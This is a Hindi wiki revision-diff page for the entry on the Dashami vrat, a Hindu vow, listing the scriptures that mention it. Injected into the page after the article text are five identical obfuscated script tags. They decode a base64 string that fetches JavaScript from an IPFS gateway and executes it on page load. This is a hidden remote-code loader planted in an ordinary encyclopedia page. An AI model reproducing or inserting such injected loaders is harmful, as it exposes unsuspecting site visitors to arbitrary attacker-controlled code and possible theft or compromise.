"दशमी व्रत" के अवतरणों में अंतर
[अनिरीक्षित अवतरण] | [अनिरीक्षित अवतरण] |
('*भारत में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा ...' के साथ नया पन्ना बनाया) |
व्यवस्थापन (चर्चा | योगदान) छो (Text replace - ")</ref" to "</ref") |
||
(४ सदस्यों द्वारा किये गये बीच के ५ अवतरण नहीं दर्शाए गए) | |||
पंक्ति १: | पंक्ति १: | ||
− | *[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में | + | *[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है। |
− | *हेमाद्रि<ref>हेमाद्रि (व्रतखण्ड 2, 963-983);</ref>, कालनिर्णय<ref>कालनिर्णय (230-233);</ref>, पुरुषार्थचिन्तामणि<ref>पुरुषार्थचिन्तामणि (142-148);</ref> और व्रतराज<ref>व्रतराज (352-361 | + | *हेमाद्रि<ref>हेमाद्रि (व्रतखण्ड 2, 963-983);</ref>, कालनिर्णय<ref>कालनिर्णय (230-233);</ref>, पुरुषार्थचिन्तामणि<ref>पुरुषार्थचिन्तामणि (142-148);</ref> और व्रतराज<ref>व्रतराज (352-361</ref> में इसका उल्लेख है। |
− | *हेमाद्रि ने 11 नाम दिये हैं, किन्तु कृत्यकल्पतरु<ref>कृत्यकल्पतरु (व्रतखण्ड, 309 | + | *हेमाद्रि ने 11 नाम दिये हैं, किन्तु कृत्यकल्पतरु<ref>कृत्यकल्पतरु (व्रतखण्ड, 309</ref> ने केवल एक ही व्रत का उल्लेख किया है, यथा-सार्वभौमव्रत। |
− | + | {{प्रचार}} | |
− | {{ | + | {{संदर्भ ग्रंथ}} |
− | |||
− | |||
− | |||
− | |||
− | |||
− | }} | ||
==टीका टिप्पणी और संदर्भ== | ==टीका टिप्पणी और संदर्भ== | ||
<references/> | <references/> |
१२:४८, २७ जुलाई २०११ के समय का अवतरण
- भारत में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित हिन्दू धर्म का एक व्रत संस्कार है।
- हेमाद्रि[१], कालनिर्णय[२], पुरुषार्थचिन्तामणि[३] और व्रतराज[४] में इसका उल्लेख है।
- हेमाद्रि ने 11 नाम दिये हैं, किन्तु कृत्यकल्पतरु[५] ने केवल एक ही व्रत का उल्लेख किया है, यथा-सार्वभौमव्रत।
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
टीका टिप्पणी और संदर्भ
संबंधित लेख
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>